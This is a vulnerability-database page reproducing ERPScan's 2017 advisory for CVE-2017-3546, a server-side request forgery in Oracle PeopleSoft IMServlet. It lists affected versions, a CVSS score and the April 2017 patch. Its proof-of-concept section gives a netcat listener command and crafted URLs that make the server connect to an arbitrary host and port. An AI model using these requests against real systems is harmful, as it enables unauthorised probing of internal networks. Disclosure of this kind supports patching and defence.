Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtERPScan1337DAY-ID-27806
HistoryMay 20, 2017 - 12:00 a.m.

Oracle PeopleSoft - Server-Side Request Forgery Vulnerability

2017-05-2000:00:00
ERPScan
0day.today
49

0.008 Low

EPSS

Percentile

82.2%

JSON

Exploit for java platform in category web applications

Application: Oracle PeopleSoft
Versions Affected: ToolsRelease: 8.55.03; ToolsReleaseDB: 8.55;
PeopleSoft HCM 9.2
Vendor URL: http://oracle.com
Bugs: SSRF
Reported: 23.12.2016
Vendor response: 24.12.2016
Date of Public Advisory: 18.04.2017
Reference: Oracle CPU April 2017
Author: Roman Shalymov (ERPScan)
 
Description
 
1. ADVISORY INFORMATION
 
Title:[ERPSCAN-17-022] SSRF in PeopleSoft IMServlet
Advisory ID: [ERPSCAN-17-022]
Risk: high
CVE: CVE-2017-3546
Advisory URL: https://erpscan.com/advisories/erpscan-17-022-ssrf-peoplesoft-imservlet/
Date published: 18.04.2017
Vendors contacted: Oracle
 
 
2. VULNERABILITY INFORMATION
 
Class: SSRF
Impact: cross-site port attack, service enumeration
Remotely Exploitable: yes
Locally Exploitable: yes
 
CVSS Information
 
CVSS Base Score v3:    8.0 / 10
CVSS Base Vector:
AV : Attack Vector (Related exploit range) Network (N)
AC : Attack Complexity (Required attack complexity) High (H)
PR : Privileges Required (Level of privileges needed to exploit) High (H)
UI : User Interaction (Required user participation) None (N)
S : Scope (Change in scope due to impact caused to components beyond
the vulnerable component) Changed (C)
C : Impact to Confidentiality High (H)
I : Impact to Integrity High (H)
A : Impact to Availability High (H)
 
 
3. VULNERABILITY DESCRIPTION
 
An attacker can force a vulnerable server to trigger malicious
requests to third-party servers or to internal resources. This
vulnerability can then be leveraged to launch specific attacks such as
a cross-site port attack, service enumeration, and various other
attacks.
 
4. VULNERABLE PACKAGES
 
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
 
5. SOLUTIONS AND WORKAROUNDS
 
To correct this vulnerability, implement Oracle CPU April 2017
 
6. AUTHOR
 
Roman Shalymov
 
7. TECHNICAL DESCRIPTION
 
PoC
 
Run netcat
 
1. nc -l -p # on some host
 
In browser open the following links
 
http://PPLSOFTSRV:8000/IMServlet?Method=CONNECT
 
http://PPLSOFTSRV::8000/IMServlet?Method=GOOGLE_PRESENCE&im_to_user=abc&im_server_name=GOOGLE&im_server=SOMEHOST:OPEN_PORT/?param=var%23"
 
 
Read response in netcat
 
GET /?param=var HTTP/1.1
 
User-Agent: Java1.7.0_95
 
Host: SOMEHOST:OPEN_PORT
 
Accept: text/html, image/gif, image/jpeg, /; q=.2
 
Connection: Keep-Alive

#  0day.today [2018-04-12]  #

Related

cve 1
packetstorm 1
zdt 1
exploitpack 1
prion 1
cvelist 1
nvd 1
erpscan 1
exploitdb 1
oracle 1
cve
cve
CVE-2017-3546
2017-04-24 19:59:04
packetstorm
packetstorm
Oracle PeopleSoft ToolsRelease / ToolsReleaseDB / HCM SSRF
2017-04-20 00:00:00
zdt
zdt
Oracle PeopleSoft ToolsRelease / ToolsReleaseDB / HCM SSRF Vulnerabilities
2017-04-20 00:00:00
exploitpack
exploitpack
Oracle PeopleSoft - Server-Side Request Forgery
2017-05-19 00:00:00
prion
prion
Code injection
2017-04-24 19:59:00
cvelist
cvelist
CVE-2017-3546
2017-04-24 19:00:00
nvd
nvd
CVE-2017-3546
2017-04-24 19:59:04
erpscan
erpscan
SSRF in PeopleSoft IMServlet
2016-12-23 00:00:00
exploitdb
exploitdb
Oracle PeopleSoft - Server-Side Request Forgery
2017-05-19 00:00:00
oracle
oracle
Oracle Critical Patch Update Advisory - April 2017
2017-04-18 00:00:00

0.008 Low

EPSS

Percentile

82.2%

JSON
Related for 1337DAY-ID-27806
cve1packetstorm1zdt1exploitpack1prion1cvelist1nvd1erpscan1exploitdb1oracle1